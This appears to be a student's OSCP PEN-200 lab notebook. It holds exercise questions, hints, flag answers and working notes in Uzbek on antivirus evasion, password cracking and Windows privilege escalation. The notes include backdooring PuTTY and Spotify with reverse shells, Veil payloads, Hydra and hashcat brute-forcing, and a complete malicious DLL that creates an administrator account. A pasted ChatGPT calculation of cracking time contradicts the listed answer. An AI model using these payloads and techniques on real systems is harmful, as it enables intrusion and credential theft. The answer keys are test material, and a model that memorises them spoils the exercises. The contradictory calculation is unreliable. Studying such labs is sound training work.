2. Review the steps after memory allocation in Remote Process Injection.
Command
3. Between packers and crypters, which one provides the highest level of stealth?
Answer
crypters
View hints
HINT
This encryption can make it significantly more difficult for antivirus and security software to detect the malicious
code, as it appears as encrypted data rather than executable code.
Command
14.3.2. Evading AV with Thread Injection
Labs
1. Review the code from the PowerShell script and ensure that you have a basic understanding of how it works. Connect
to the VM 1 and get a shell back to your Kali Linux machine using the memory injection PowerShell AV bypass technique
we covered in this Learning Unit. As an additional exercise, attempt to get a reverse shell using a PowerShell one-liner
rather than a script (https://github.com/darkoperator/powershell_scripts/blob/master/ps_encoder.py). Which API have
we used in our script to allocate memory for the shellcode?
Answer
VirtualAlloc
View hints
HINT
OSCP PEN-200 111
1. Repeat the steps demonstrated in the video and text.
2. Remember to open ""Windows PowerShell (x86)"" according to the architecture set for the msfvenom payload.
3. For the answer, refer to the paragraph about allocating blocks of memory.
Command
14.3.3. Automating the Process
Antivirus Evasion - Evading AV - Automating the Process - VM #1
Antivirus Evasion - Module Exercise - VM #1
Antivirus Evasion - Module Exercise - VM #2
Labs
1. Use Shellter to inject a Meterpreter reverse shell payload in the Spotify executable, then transfer the binary to your
Window 11 client VM #1 and ensure that it is not being detected by the antivirus. After, set up a Meterpreter listener, run
the backdoored Spotify installer, and
verify that you have obtained an interactive shell. As an additional exercise, attempt to find different executables and
inject malicious code into them using Shellter.
Which Shellter option is responsible for restoring the execution flow of the backdoored binary and therefore avoids any
unwanted suspicion?
Answer
Stealth Mode
View hints
HINT
1. Refer to the notes and video showing how to create and transfer the backdoored Spotify installer.
2. For the answer, refer to the paragraph about restoring the execution flow.
Command
2. Capstone Lab: In this exercise, you'll be facing off against COMODO antivirus engine running on Module Exercise VM
#1. Use another popular 32-bit application, like PuTTY, to replicate the steps learned so far in order to inject malicious
code in the binary with Shellter. The victim machine runs an anonymous FTP server with open read/write permissions.
Every few seconds, the victim user will double-click on any existing .exe file(s) in the FTP root
OSCP PEN-200 112
directory. If the antivirus flags the script as malicious, the script will be quarantined and then deleted. Otherwise, the
script will execute and hopefully, grant you a reverse shell. NOTE: set the FTP session as
active and enable binary encoding while transferring the file.
Answer
OS{d197314a926a15380f754bfabe4eebc7}
View hints
HINT
1. Download the binary from https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe
2. Remember to set the FTP session as active: ftp -A 192.168.xxx.53 and enable binary mode: ftp> bin
Command
shellterni ishga tushirib, Auto mode ni tanlab, boyigi putty dasturini Path ni kiritamiz.
Stealth Mode ni yoqib, listdagi shell ni tanlab, ozimizni ip va portimizni kiritamiz
OSCP PEN-200 113
metasploitda local ip miz va port imiz bn listen qilib turamiz
-A property si FTP serverni active ligini anglatadi, anonymous deb kirib userga, passwordga hech narsa yozmaymiz, bin commandi
binary shaklga o’zgartiradi, va put commandi orqali putty.exe fileni yuklaymiz
va bizga reverse shell ochiladi, flag esa \users\administrator\desktop\flag.txt ichida
OSCP PEN-200 114
3.Capstone Lab: Similar to the previous exercise, you'll be facing off against COMODO antivirus engine v12.2.2.8012 on
Module Exercise VM #2. Although the PowerShell AV bypass
we covered in this Module is substantial, it has an inherent limitation. The malicious script cannot be
double-clicked by the user for an immediate execution. Instead, it would open in
notepad.exe or another default text editor. The tradecraft of manually weaponizing PowerShell scripts is beyond the
scope of this module, but we can rely on another open-source framework to help us automate this process. Research
how to install and use the Veil framework to help
you with this exercise.
The victim machine runs an anonymous FTP server with open read/write
permissions. Every few seconds, the victim user will double-click on
any existing Windows batch script file(s) (
.bat) in the FTP root
directory. If the antivirus flags the script as malicious, the script
will be quarantined and then deleted. Otherwise, the script will
execute and hopefully, grant you a reverse shell.
Answer
OS{6d35088590c257c41bff71cf0a0c2477}
View hints
HINT
1. The installation steps are already provided in the Veil-Framework link.
2. Remember to set the FTP session as active: ftp -A 192.168.xxx.53 and enable binary mode: ftp> bin
Command
veil frameworkni o’rnatamiz
OSCP PEN-200 115
sudo huquqi bilan veilni ishga tushuramiz
OSCP PEN-200 116
OSCP PEN-200 117
evasion ishga tushganidan keyin list commandi orqali payloadlarni ko’ramiz va powershell/meterpreter/rev_tcp.py no tanlaymiz
OSCP PEN-200 118
OSCP PEN-200 119
payload tanlab bo’ganidan keyin optionlarni ya’ni LHOST va LPORT larni kiritamiz, va yaratiladigan bat fileni nomini beramiz
yaratib bo’lib uni turgan joyimizga copy qilamiz
va metasploit orqali listening qilamiz
malware mizani yuklaymiz userga anonymous, password ni o’tkazib yuboramiz, put commandi orqali bat filemizani yuklaymiz
OSCP PEN-200 120
va bizda reverse shell paydo bo’ladi, va biz flagni C:\Users\Administrator\Desktop ichidan topamiz
15. Password Attacks
7.1.1. SSH and RDP
Password Attacks - SSH and RDP - VM #1 192.168.136.201
Password Attacks - SSH and RDP - VM #2
Password Attacks - SSH and RDP - VM #3
Labs
1. Follow the steps outlined in this section to leverage a dictionary
attack to get access to SSH (port 2222) on VM #1 (BRUTE). Find the flag
in the
george user's home directory.
Answer
OS{b3ad949fa77f91e9f98a7c4912ac9580}
View hints
1. Use the commands provided in listing 2 and make sure to adjust the IP address with VM #1's IP.
2. When connecting to SSH, remember to set the port as 2222 using the -p 2222 option.
Command
OSCP PEN-200 121
2. Follow the steps outlined in this section to leverage a dictionary
attack to gain access to RDP on VM #2 (BRUTE2). Find the flag on either
one of the user's desktops. To reduce the time it takes to perform the
password spraying, you can create a list with the two usernames:
justin and daniel.
Answer
OS{f0c30e8018150d11f0ff00193313a7e3}
View hints
1. Create a custom wordlist with only the names justin and daniel and
use the command provided in listing 3. Make sure to adjust the IP
address with VM #2's IP.
2. RDP to the target with either justin or daniel and the password you have obtained.
Command
OSCP PEN-200 122
justin bn daniel ni user.txt file ga saqlab hydra ning -L optionidan foydalanb userlarni fiyl shaklida ko’rsatib
bruteforce ni boshlimiz
3. Enumerate VM #3 (BRUTE2) and find another network service. Use the knowledge from this section to get access as
the itadmin user and find the flag.
Answer
OS{6d117cb0f9332775553031e47ae29248}
View hints
1. Perform an Nmap scan to identify the different network service.
2. Use the rockyou.txt wordlist. Ensure the target is set according to the different protocol.
3. Cracking will only take a few seconds.
4. Flag can be downloaded with the "get" command.
Command
OSCP PEN-200 123
OSCP PEN-200 124
7.1.2. HTTP POST Login Form
Password Attacks - HTTP POST Login Form - VM #1
Password Attacks - HTTP POST Login Form - VM #2
Labs
1. Follow the steps from this section to gain access to TinyFileManager on VM #1 (BRUTE). Once logged in, find the flag.
Answer
OS{55e6939cc123996995f9ff8fd3a4dc6f}
View hints
1. Refer to the listing 4 and perform a dictionary attack on your assigned VM #1.
2. Log in using the obtained password.
3. The flag can be found inside install.txt.
Command
OSCP PEN-200 125
OSCP PEN-200 126
2. The web page on VM #2 is password protected. Use Hydra to perform a password attack and get access as user
admin. Once you have identified the correct password, enter it as the answer to this exercise.
Answer
789456
View hints
1. The authentication mechanism here is HTTP basic authentication.
2. Hydra support various protocols such as http-get and http-post which
can be used depending on the application to perform a dictionary attack
to obtain the password.
Command
7.2.1. Introduction to Encryption, Hashes and Cracking
Labs
1. Answer with true or false: In symmetric encryption, one key is used for both the encryption and decryption process.
Answer
true
View hints
no hints
Command
no commands
2. Answer with true or false: In asymmetric encryption, we can share
the private key freely over the network to another person without
OSCP PEN-200 127
risking that a third party can capture our key and then decrypt messages
which get sent to us.
Answer
false
View hints
no hints
Command
no commands
3. Answer with true or false: A cryptographic hash function is a
one-way function. The resulting hash cannot be reversed by reversing the
steps used to hash the plain text information.
Answer
true
View hints
no hints
Command
no commands
4. Use the MD5 GPU hash rate from the GPU benchmark of this section and
calculate the cracking time in minutes with the following conditions.
Use a charset of all lower and upper case letters of the English
alphabet and use a password length of 8. Enter the answer as full
minutes without seconds.
Answer
13
View hints
1. Count the total number of lowercase and uppercase letters.
2. Since the password length is 8 characters, multiply the count from step 1 by 8.
3. Divide the result by the number of MD5 GPUs, and then by 60 to find how many minutes it will take.
Command
if gpu hashrate is 68,185.1 MH/s
calculate with this
ChatGPT said:
ChatGPT
Let's calculate the cracking time with a GPU hash rate of 68,185.1 MH/s. This is equivalent to:
H=68,185,100,000 hashes/second (68.1851 billion hashes per second).H = 68,185,100,000 \, \text{hashes/second
(68.1851 billion hashes per second)}.
H=68,185,100,000hashes/second (68.1851 billion hashes per second).
Step-by-Step Calculation
1. Charset Size:
The charset contains 52 characters (26 lowercase + 26 uppercase).
2. Total Password Combinations:528=53,459,728,531,456
OSCP PEN-200 128
For a password length of 8:
528=53,459,728,531,45652^8 = 53,459,728,531,456
3. Time in Seconds:Time (seconds)=Hash rateTotal combinations
Time (seconds)=68,185,100,00053,459,728,531,456=784,006.94seconds
Time (seconds)=Total combinationsHash rate\text{Time (seconds)} = \frac{\text{Total combinations}}
{\text{Hash rate}}
Substituting the values:
Time (seconds)=53,459,728,531,45668,185,100,000=784,006.94 seconds\text{Time (seconds)} =
\frac{53,459,728,531,456}{68,185,100,000} = 784,006.94 \, \text{seconds}
4. Convert to Minutes:Time (minutes)=60Time (seconds)=60784,006.94=13,066.78minutes.
Time (minutes)=Time (seconds)60=784,006.9460=13,066.78 minutes.\text{Time (minutes)} = \frac{\text{Time
(seconds)}}{60} = \frac{784,006.94}{60} = 13,066.78 \, \text{minutes}.
5. Round to Full Minutes:Cracking Time=13,067minutes.
Cracking Time=13,067 minutes.\text{Cracking Time} = 13,067 \, \text{minutes}.
Final Answer:
The cracking time is approximately 13,067 minutes.
7.2.2. Mutating Wordlists
Labs
1. You extracted the MD5 hash "056df33e47082c77148dba529212d50a" from a
target system. Create a rule to add "1@3$5" to each password of the
rockyou.txt wordlist and crack the hash.
Answer
courtney1@3$5
View hints
1. Define each character individually using the '$' symbol:
cat demo.rule:
$1 $@ $3 $$ $5
2. Use Hashcat for cracking MD5-hashed passwords.
Command
OSCP PEN-200 129
2. You extracted the MD5 hash "19adc0e8921336d08502c039dc297ff8" from a
target system. Create a rule which makes all letters upper case and
duplicates the passwords contained in
rockyou.txt and crack the hash.
Answer
BUTTERFLY5BUTTERFLY5
View hints
1. cat demo5.rule: u d
2. Use Hashcat for cracking MD5-hashed passwords.
Command
7.2.3. Cracking Methodology
Labs
1. Identify the hash function of the following hash
"4a41e0fdfb57173f8156f58e49628968a8ba782d0cd251c6f3e2426cb36ced3b647bf83057dabeaffe1475d16e7f62b7"
Answer
SHA-384
View hints
hash-identifier tool
Command
OSCP PEN-200 130
2. Identify the hash function of the following hash
"$2y$10$XrrpX8RD6IFvBwtzPuTlcOqJ8kO2px2xsh17f60GZsBKLeszsQTBC"
Answer
bcrypt
View hints
hashid tool
Command
7.2.4. Password Manager
Password Attacks - Password Manager - VM #1 192.168.169.203
Password Attacks - Password Manager - VM #2
Labs
1. Follow the steps outlined in this section to obtain the master
password of the KeePass database on VM #1 (SALESWK01). Enter the
password found with the title "User Company Password".
Answer
XOWV2yg3JVkYc5cOBYip
View hints
no hints
Command
OSCP PEN-200 131
OSCP PEN-200 132
2. Enumerate VM #2 and get access to the system as user nadine.
Obtain the password stored as title "flag" in the password manager and
enter it as answer to this exercise. Note that the flag is not formatted
as
OS{} for this exercise.
Answer
eSGJIzUp5nrr834QZBWK
OSCP PEN-200 133
View hints
1) Run an Nmap scan to find open ports.
2) Determine which protocol to brute force for GUI access.
3) Use the provided username and perform a dictionary attack for the password.
4) Once you login with the new password, check out the Documents folder of the nadine user and crack the
password manager as shown in the course.
5) Note that this flag isn't formatted as OS{}. Use the exact value.
Command
bruteforce qildim lekin passwordini hydra topolmadi
OSCP PEN-200 134
nano yordamida Database: ni olib tashlash kerak
OSCP PEN-200 135
7.2.5. SSH Private Key Passphrase
Password Attacks - SSH Private Key Passphrase - VM #1 192.168.210.201
Password Attacks - SSH Private Key Passphrase - VM #2
Labs
1. Follow the steps outlined in this section to get access to VM #1
(BRUTE) on port 2222 with SSH by cracking the passphrase of the private
key. Find the flag in the home directory of the user
dave.
Answer
OS{2f68316dca8e8eb2742c609b36303e35}
View hints
no hints
Command
OSCP PEN-200 136
id_rsa ni download qlib
OSCP PEN-200 137
2. Enumerate VM #2 and find a way to get access to SSH on port 2222.
Find the flag of the user you used for the SSH connection. You can use
the same rules we created in this section.
Answer
OS{345bd58830e1f8de9d9a6cd474a799ad}
View hints
1. Run an Nmap scan to find open ports.
2. Enumerate web server version to find a vulnerability.
OSCP PEN-200 138
3. Using the vulnerability, enumerate the users on the system and obtain the .ssh key.
4. Use the commands provided in Listing 28 and 35 to crack the passphrase for the SSH key.
5. Obtain the flag by logging in via SSH by using the -p option.
Command
OSCP PEN-200 139
alfred_rsa: ni ochirb tashlimz
OSCP PEN-200 140
7.3.1. Cracking NTLM
Password Attacks - Cracking NTLM - VM #1
Password Attacks - Cracking NTLM - VM #2
Labs
1. Follow the steps outlined in this section and find the flag on the
nelly user's desktop on VM #1 (MARKETINGWK01).
Answer
OS{ceb06484bad38656ae3e01639fe68830}
View hints
no hints
Command
OSCP PEN-200 141
OSCP PEN-200 142
2. Access VM #2 via RDP as user nadine with the password
retrieved in the exercise of the section labeled "Password Manager" and
leverage the methods from this section to extract Steve's NTLM hash. Use
best64.rule for the cracking process and enter the plain text password as answer to this exercise.
Answer
francesca77
View hints
1. Obtain the password of nadine by completing the Password Manager learning unit Q2 exercise.
2. Use the commands provided in Listings 39 and 42 to obtain Steve's password.
Command
OSCP PEN-200 143
15.3.2. Passing NTLM
Password Attacks - Passing NTLM - VM Group 1 + 192.168.210.211 192.168.210.212
Labs
1. Use the methods from this section to get access to VM #2 and find the flag on the desktop of the user
Administrator.
Answer
OS{96805bee3414d881bb636797b67254ce}
View hints
1. Connect to VM #1 via RDP with the provided credentials.
2. Use the provided commands in listing 43 and mimikatz is located on C:\tools\ .
3. After you have obtained the NTLM hash, use the commands provided in listing 44 to connect your .212 machine.
Command
192.168.210.211 cred gunther password123!
OSCP PEN-200 144
Administrator NTLM hashni oganimizdan keyin 2 hil yol bn privilege escalation qilsa boladi
1)
2)
OSCP PEN-200 145
15.3.3. Cracking Net-NTLMv2
Password Attacks - Cracking Net-NTLMv2 - VM #1 192.168.210.211
Password Attacks - Cracking Net-NTLMv2 - VM #2
Labs
1. Follow the steps outlined in this section to obtain the Net-NTLMv2 hash in Responder. Crack it and use it to connect
to VM #1 (FILES01) with RDP. Find the flag on
paul's desktop. Attention: If the bind shell is terminated it may take up to 1 minute until it is accessible again.
Answer
OS{bda9c997e2e8132cb169a1be5f00459a}
View hints
no hints
Command
OSCP PEN-200 146
OSCP PEN-200 147
2. Enumerate VM #2 and find a way to obtain a Net-NTLMv2 hash via the web application. Important: Add
marketingwk01 to your /etc/hosts file with the corresponding IP address of the machine. After you have obtained the
Net-NTLMv2 hash, crack it, and connect to the system to
find the flag.
Answer
OS{f5d6b9f3330599a1a9b856459ceeb422}
View hints
no hints
Command
OSCP PEN-200 148
OSCP PEN-200 149
OSCP PEN-200 150
15.3.4. Relaying Net-NTLMv2
Password Attacks - Relaying Net-NTLMv2 - VM Group 1 + 192.168.210.211
Password Attacks - Relaying Net-NTLMv2 - VM Group 2
Labs
1. Use the methods from this section to get access to VM #2 (FILES02) of VM Group 1 and obtain the flag on the
files02admin user's desktop. If the bind shell on VM #1 is terminated, it may take up to 1 minute until it is accessible
again.
Answer
OS{8432c315f06dd4a249dd5b3a490b50f9}
View hints
1. For base64 encoding, use the commands provided in listing 57 of Using Executable Files in Common Web
Application Attacks module.
2. Use the commands provided in listing 52 to relay your powershell commands.
Command
OSCP PEN-200 151
OSCP PEN-200 152
2. Capstone Lab: Start VM Group 2 and find a way to obtain a Net-NTLMv2 hash from the anastasia user via the web
application on VM #3 (BRUTE2) and relay it to VM #4 (FILES02).
Answer
OS{15ef1336883fae5ca4832307853d73c0}
View hints
1. Start the ntlmrelayx server as shown in listing 52.
2. Access the Beta App and execute the dir command shown in listing 49.
3. Remember to use your assigned Kali IP address.
Command
oldingi labdagi encoded powershell scriptni bundayam ishlatim
OSCP PEN-200 153
15.3.5. Windows Credential Guard
Password Attacks - Windows Credential Guard - VM Group 1
Labs
1. Start VM Group 1 and repeat the steps discussed in this section. What domain does the
Administrator user extracted from Mimikatz belong to?
Answer
CORP
OSCP PEN-200 154
View hints
no hints
Command
2. What is the name of the hypervisor developed by Microsoft?
Answer
Hyper-V
View hints
no hints
Command
3. In which Virtual Trust Level (VTL) can LSAISO.exe be found?
Answer
VTL1
View hints
no hints
Command
4. In what format must Security Support Providers be in to register in lsass.exe?
Answer
DLL
View hints
no hints
Command
16. Windows Privilege Escalation
OSCP PEN-200 155
16.1.1. Understanding Windows Privileges and Access Control Mechanisms
Labs
1. What is the RID of the first standard user?
Answer
1000
View hints
no hints
Command
2. Answer with true or false: An access token is generated when a user is created and is immutable.
Answer
false
View hints
no hints
Command
16.1.2. Situational Awareness
Windows Privilege Escalation - Situational Awareness - VM #1
Windows Privilege Escalation - Situational Awareness - VM #2
Labs
1. Check the users of the local group
Remote Management Users on CLIENTWK220 (VM #1). Enter a user which is in this group apart from steve.
Answer
daveadmin
View hints
HINT
1. Connect to your assigned VM #1 using the netcat bind shell on port 4444, as demonstrated in listing 6.
2. To view the list of users in the Remote Management Users group, refer to the command in listing 10.
Command
OSCP PEN-200 156
2. Enumerate the installed applications on CLIENTWK220 (VM #1) and find the flag.
Answer
OS{6b4f9c1c1a3d592632020ca332f48e10}
View hints
HINT
1. Connect to your assigned VM #1 using the netcat bind shell on port 4444.
2. Refer to the listing 15 to find out the installed applications.
3. To display all properties, remove 'select displayname' from the command.
Command
OSCP PEN-200 157
3. We'll now use an additional machine, CLIENTWK221 (VM #2), to practice what we learned in this section. Access the
machine via RDP as user mac with the password IAmTheGOATSysAdmin!. Identify another member of the local
Administrators group apart from offsec and Administrator.
Answer
roy
View hints
HINT
Refer to listing 10 for local Administrators group users.
Command
OSCP PEN-200 158
4. Enumerate the currently running processes on CLIENTWK221 (VM #2). Find a non-standard process and locate the
flag in the directory of the corresponding binary file.
Answer
OS{eb1adcec62664ca2ba481fa9effb72f2}
View hints
HINT
1. Refer to the listing 16 to retrieve a list of all running processes.
2. Look for non-standard processes by checking unusual names or locations in the output.
3. Identify the process binary file path, then check the binary file path to obtain the flag.
Command
OSCP PEN-200 159
16.1.3. Hidden in Plain View
Windows Privilege Escalation - Hidden in Plain View - VM #1
OSCP PEN-200 160
Windows Privilege Escalation - Hidden in Plain View - VM #2
Labs
1. Connect to the bind shell (port 4444) on
CLIENTWK220 (VM #1) and follow the steps from this section. Find the flag on the desktop of backupadmin.
Answer
OS{ba26cfc4ba7d39e2276f9ec983c9436b}
View hints
HINT
1. Connect to your assigned VM #1 using the netcat bind shell on port 4444.
2. Follow the steps shown in this section on your assigned VM #1.
Command
OSCP PEN-200 161
OSCP PEN-200 162
2. Log into the system CLIENTWK220 (VM #1) via RDP as user steve. Search the file system to find login credentials for
a web page for the user steve and enter the password as answer to this exercise.
Answer
thisIsWhatYouAreLookingFor
View hints
HINT
1. Log in to VM #1 using the password we have found in the previous exercise listing 21.
2. Use the command provided in listing 18 to search for text files in C:\users directory.
Command
OSCP PEN-200 163
3. Connect to CLIENTWK221 (VM #2) via RDP as user mac with the password IAmTheGOATSysAdmin! and locate
sensitive information on the system to elevate your
privileges. Once found, use the credentials to access the system as this
user and find the flag on the Desktop.
Answer
intruder
View hints
HINT
1. Use the command provided in listing 18 to search for files in C:\users directory.
2. Decode the content of the file you have found.
3. Use runas command as shown in figure 3 to connect with the new credentials.
Command
OSCP PEN-200 164
16.1.4. Information Goldmine PowerShell
Windows Privilege Escalation - Information Goldmine PowerShell - VM #1
Windows Privilege Escalation - Information Goldmine PowerShell - VM #2
Labs
1. Follow the steps above and obtain an interactive shell as
daveadmin on CLIENTWK220 (VM #1). Enter the flag, which can be found on the desktop.
Answer
OS{aafbb95985ae290a37d9ad9411e64c32}
View hints
HINT
1. Connect to your assigned VM #1 using the netcat bind shell on port 4444.
2. To obtain the flag follow the steps provided in 16.1.4 learning unit.
Command
OSCP PEN-200 165
OSCP PEN-200 166
2. Connect to CLIENTWK220 (VM #1) as daveadmin via RDP. Use the Event Viewer to search for events recorded by
Script Block Logging. Find the password in these events.
Answer
ThereIsNoSecretCowLevel1337
View hints
no hints
Command
OSCP PEN-200 167
3. Connect to CLIENTWK221 (VM #2) via RDP as user mac with the password IAmTheGOATSysAdmin!. Enumerate the
machine and use the methods from this section to find the flag.
OSCP PEN-200 168
Answer
OS{f8932802863c899c03036bbcec8ae012}
View hints
HINT
Refer to the commands used in Listings 26, 27 and 28.
Command
16.1.5. Automated Enumeration
Windows Privilege Escalation - Automated Enumeration - VM #1
Labs
1. Follow the steps from this section and examine the output headlined
Checking for DPAPI Credential Files. Enter one of the MasterKeys as answer.
Answer
1a65c284-d429-4e6b-b7ab-5fc1a2d95636
View hints
HINT
1. Begin by running WinPEAS on the VM #1. Look for the 'Checking for
DPAPI Credential Files' section and then masterkeys in the output.
2. Alternatively, you can also redirect the output to a text file using the > operator and search the masterkeys.
Command
cp /usr/share/peass/winpeas/winPEASx64.exe .
python3 -m http.server 80
OSCP PEN-200 169
nc 192.168.45.239 4444
powershell
iwr -uri http://192.168.48.3/winPEASx64.exe -Outfile winPEAS.exe
.\winPEAS.exe > 1.txt
fileni o’qib olamiz va ‘Checking for DPAPI Credential Files’ ni qidiramiz
checking for DPAPI master keys dagi 1-si bizni javobimiz
2. Download a precompiled version of Seatbelt or compile it yourself. To find a precompiled version of Seatbelt, you can
enter the search term compiled seatbelt github download in a search engine. Transfer the binary to VM #1 and launch
it with the option -group=all. Find a section named InstalledProducts and locate the entry for XAMPP. Enter the value of
DisplayVersion as answer to this exercise.
Answer
7.4.29-1
View hints
HINT
1. After downloading Seatbelt.exe on your local VM, transfer it to your assigned VM #1 by using iwr as shown in
listing 34.
2. Run Seatbelt.exe on powershell with the -group=all argument and search for the section named
InstalledProducts.
Command
OSCP PEN-200 170
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/tree/master
shu URL dan man seatbelt.exe ni download qilib olib
hostimizga tashlaymiz
16.2.1. Service Binary Hijacking
Windows Privilege Escalation - Service Binary Hijacking - VM #1
Windows Privilege Escalation - Service Binary Hijacking - VM #2
Labs
1. Follow the steps outlined in this section on
CLIENTWK220 (VM #1) to replace the service binary of the service mysql. Enter the flag, which can be found on the
desktop of user daveadmin.
Answer
OS{d9607c2408f5bafd1fd2bcd1f0aea84b}
View hints
HINT
1. Follow the steps provided in this learning unit to obtain the shell as user dave2.
2. If you encounter any issues while using RunAs, you can try running an Administrator command prompt and
OSCP PEN-200 171
entering the credentials for user dave2 to obtain a shell.
Command
OSCP PEN-200 172
administrator nomidan ishga tushiramiz powershellni
2. Connect to CLIENTWK221 (VM #2) via RDP as user milena with the password MyBirthDayIsInJuly1!. Find a service in
which milena can replace the service binary. Get an interactive shell as user running the service and find the flag on the
desktop.
Answer
OS{1684288b03c6c5c3b674d6a0b706514c}
OSCP PEN-200 173
View hints
HINT
1. Import PowerUp.ps1 to identify a service to modify.
2. Replace the service's executable by renaming with a malicious binary.
3. Restart the service to trigger the malicious binary and gain shell access.
4. The flag is on roy user's desktop.
Command
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Runnin
Bu dasturni boshqa joyga ko’chirib
ozimizni hostimizdan c da yozilgan user qo’shib beruvchi payloadni yuklaymiz
va ushbi dasturni BackupMonitor.exe turgan joyga ismini huddi shunday o’zgartirib tashlaymiz
dasturni reaload qilolmaganimiz uchun va dasur autoload mode sida turgani uchun hostimizga reboot beramiz va yonganida ushbu
service ishlab bizga yangi user ochib beradi
yangi userga bog’lanamiz
OSCP PEN-200 174
ushbu userda administrator huquqi bn p[owershellni ishga tushurib flagni olamiz
16.2.2. DLL Hijacking
Windows Privilege Escalation - DLL Hijacking - VM #1 192.168.207.220
Labs
1. Follow the steps from this section on
CLIENTWK220 (VM #1) to identify the missing DLL, cross-compile your own DLL, and place it in a directory that it gets
executed when the service FileZilla FTP Client is started. After placing the malicious DLL wait several minutes for a
high privileged user to start the application, obtain code execution, an interactive shell, or access to the GUI and enter
the flag, which can be found on the desktop of daveadmin.
Answer
OS{ad7e94d806def8b5191812f869bf6b56}
View hints
HINT
1. Follow the steps in this learning unit.
2. Install mingw-w64 with the command: sudo apt install mingw-w64 .
3. If you encounter any issues with RunAs, try running an Administrator
command prompt and entering dave2's credentials to obtain a shell.
Command
OSCP PEN-200 175
backupadmin user orqali ishga tushiramiz
bu filter orqali aynan shu app haqida ko’rish
OSCP PEN-200 176
bu filter orqali operatsiyalarni ko’rish
bu filter orqali maxsus file larni ko’rish masalan DLL
TextShaping.dll ni ishlatishini ko’rdik
OSCP PEN-200 177
#include <stdlib.h>
#include <windows.h>
BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
int i;
i = system ("net user dave3 password123! /add");
i = system ("net localgroup administrators dave3 /add");
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE;
}
x86_64-w64-mingw32-gcc TextShaping.cpp --shared -o TextShaping.dll
uni target hostimizga yuklab olamiz
BU DLL FILE MIZ ISHLASHI UCHUN FILEZILLA NI YUQORI PRIVELEGELIK USER ISHLATSAGINA DLL FILE ICHIDAGI
EXECUTE BO’LADI, BIZANI CASE DA BACKUPADMIN USER ORQALI DASTUR NI ISHGA TUSHIRGANIMDA DAVE3
USERI QO’SHILDI
OSCP PEN-200 178
16.2.3. Unquoted Service Paths
Windows Privilege Escalation - Unquoted Service Paths - VM #1
Windows Privilege Escalation - Unquoted Service Paths - VM #2
Labs
1. Follow the steps from this section on
CLIENTWK220 (VM #1) to exploit the unquoted service path of GammaService. Obtain code execution, an interactive
shell, or access to the GUI as an administrative user and find the flag on the desktop of daveadmin.
Answer
OS{a2e0c8eff0b326c4766396489a780115}
View hints
HINT
1. Follow the steps in this learning unit.
2. If you encounter any issues with RunAs, try running an Administrator
command prompt and entering dave2's credentials to obtain a shell.
Command
bu command orqali hamma servicelarni ko’ramiz
va shu no odatiy service ni topamiz
OSCP PEN-200 179
bu script esa shu noodatiy servicelarni CMD.EXE da ko’rish uchun command
GammaService ni ishga tushirib ko’ramiz, va bizda ishlaydi, to’htatb ko’ramiz, to’htaydi.
C:\ drive, Program Files , Program Files\Enterprise Apps larni permissionlarni ko’ramiz.
Va target hostimizga adduser.exe ni Current.exe ga otini o’zgartirib tashlab olamiz, va buni Program Files\Enterprise Apps\ ichiga copy
qilamiz, va yana GammaService ni ishga tushirganimizda uni ichidagi dave2 useri bizga paydo bo’ladi
OSCP PEN-200 180
OSCP PEN-200 181
biz john nomidan powershellni administrator huquqi bn ishga tushirib flagni qo’lga kiritamiz
2. Connect to CLIENTWK221 (VM #2) via RDP as user damian with the password ICannotThinkOfAPassword1!.
Enumerate the services and find an unquoted service binary path containing spaces. Exploit it with methods from this
section and obtain an interactive shell as the user running the service. Find the flag on the desktop.
Answer
OS{e2cac2f755b01cecd870cfe72a4b467e}
View hints
HINT
1. Use the provided command in listing 66 for unquoted paths and containing spaces.
2. Use the provided command in listing 69 for write permissions.
3. Replace the service's executable by renaming with a malicious binary and restart the service.
Command
OSCP PEN-200 182
shu command orqali ReynhSurveillance serviceni ko’ramiz
OSCP PEN-200 183
shu command orqali PATH ni ko’ramiz
OSCP PEN-200 184
shu pathning Permissionlarini ko’ramiz
OSCP PEN-200 185
shu command orqali payload yasaymiz
OSCP PEN-200 186
shu command orqali http web server ko’taramiz
OSCP PEN-200 187
shu command orqali target hostimizga powerhsell orqali yuklab olamiz
nc -nlvp 4444
OSCP PEN-200 188
va payload yuklagan service mizni reload qilamiz
bizda roy useri orqali shell ochildi
OSCP PEN-200 189
16.3.1. Scheduled Tasks
Windows Privilege Escalation - Scheduled Tasks - VM #1
Windows Privilege Escalation - Scheduled Tasks - VM #2
Labs
1. Follow the steps from this section on
CLIENTWK220 (VM #1) to exploit the scheduled task CacheCleanup by replacing the binary specified as action. Obtain
code execution, an interactive shell, or access to the GUI as administrative user and find the flag on the desktop of
daveadmin.
Answer
OS{98c842ccc693d582ef7514eb2ea5d17b}
View hints
HINT
1. Follow the steps in this learning unit.
2. Install mingw-w64 with the command: sudo apt install mingw-w64 .
3. If you encounter any issues with RunAs, try running an Administrator
command prompt and entering dave2's credentials to obtain a shell.
Command
OSCP PEN-200 190
schtasks /query /fo LIST /v
bu yerdan cachecleanup taskini ko’ramiz
OSCP PEN-200 191
bizdan payloadni yuklab olib
orginal appni ismini o’zgartiramiz
bizni payloadni unga yuklaymiz
1 minutdan keyin rejalashtrtlgan task ishlaydi va bizga dave2 ni yaratib beradi
bu user orqali adminitrator huquqi bilan powershellni ishga tushiramiz va flagni topamiz
2. Connect to CLIENTWK221 (VM #2) via RDP as the user moss with the password work6potence6PLASMA6flint7.
Enumerate the scheduled tasks on the system and find a way to obtain an interactive shell as user running the
scheduled task. The flag can be
found on the desktop.
Answer
OSCP PEN-200 192
OS{266728a24179875d118a6193448d7138}
View hints
HINT
1. Enumerate scheduled tasks with the command provided in listing 75.
2. If you have write permissions for the executable, replace or modify
it to execute your code, such as an msfvenom shell. Obtain the flag when
the scheduled task is triggered.
Command
OSCP PEN-200 193
payloadimizani task appga moslab load qilib oldik
orginal appni ismini o’zgartirdik
bizni payloadni ichiga kochirdik
1 minutdan keyin bizga dave2 user ochib berdi
va biz shu user credential laridan foydalanib administrator huquqi bilan terminalni ishga tushirdik va flagni topdik
16.3.2. Using Exploits
Windows Privilege Escalation - Using Exploits - VM #1
